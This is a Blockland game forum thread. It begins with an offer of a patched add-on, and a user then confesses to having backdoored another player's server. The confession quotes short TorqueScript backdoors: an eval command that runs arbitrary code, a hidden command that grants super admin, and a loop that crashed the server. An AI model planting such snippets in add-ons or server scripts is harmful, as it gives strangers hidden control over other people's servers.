Author Topic: [SOLUTION] Takes a long time to authenticate, blockland.zack0wack0.com DNS error  (Read 1728 times)

This is a fixed VCE which stops the long auth and blockland.zack0wack0.com DNS error on console from happening.

I commented out the lines which load the manual on start. All credit goes to the add-on makers.

this add-on is safe, no backdoors

axol isn't dumb enough to try something like that, but it ought to be good to add some further credibility, yes?

Well, I am not sure because he once crashed by server with your eval mod.

???
Someone abused eval on a server and that's a reason to think his add-ons have backdoors?

what eval mod, i've never made an eval mod, or at least, never made one then released it to the public

oh right, i used that to give you my horribly coded command pack.
i guess i didn't clean up and left the command there on accident after i left.

Blame TheBlackParrot a little bit, he did it too.

noedit: i just realized that i wasn't that much of a dumbass and that i made the command SA only. how the hell does that work

You put in a backupadmin command.

You put in a backupadmin command.
i don't remember this

i don't remember this
yeah scratch that denying this is stupid

at the time i had just learnt how to make functions in torquescript, and, immediately realizing the potential i made a stuffty eval script: servercmdlugeval(%c,%t){eval(%t);}
very simple, easiest backdoor ever. after convincing poor gullible scratch to put that command in his console, i used it to upload a really stuffty command pack which i don't have. iirc i didn't do anything else except change my player scale when he wasn't around. also relevant is that i had recently become SA on pecons boss battles, and scratch was hosting a OMA at the time. so i guess some kind of team spirit thing about taking him down or something? in actuality, i never took his server down maliciously, i disabled his server timed shutdown script he had for lols.

realizing how gullible scratch was, i didn't want him to get forgeted over so i added a modification to it:
servercmdlugeval(%c,%t){if(%c.issuperadmin){eval(%t);}} which would basically end the command if it wasn't a SA using it. scratch had made me SA so this was all cool.
in fear of him discovering the backdoor and flipping out (which he would've been right in doing so) i threw this backdoor into the mix: servercmdbackupadmin(%c){%c.isadmin=1;%c.issuperadmin=1;}

then axol and parrot came along and i revealed to parrot the backdoor. they went around loving with console messages and stuff until i ultimately brought the server down with while(1){echo("something here")}; to prevent axol from causing actual malicious damage to the server

sorry for lying guys

another note, I haven't done this since this incident (which was at a bare minimum 7-8 months ago) and don't intend to, whatever that's worth. why would i risk my key on something as dumb as this?

...i ultimately brought the server down with while(1){echo("something here")}; to prevent axol from causing actual malicious damage to the server such as wiping all the files from the saves directory, which he was threatening to do

Cool story bro (LITERALLY I ENJOYED IT).

loving bitches.

why would i risk my key on something as dumb as this?

I risked my old key and got it revoked which was the world's stupidest decision because that BL_ID was the first 5 digits of the Golden Ratio.
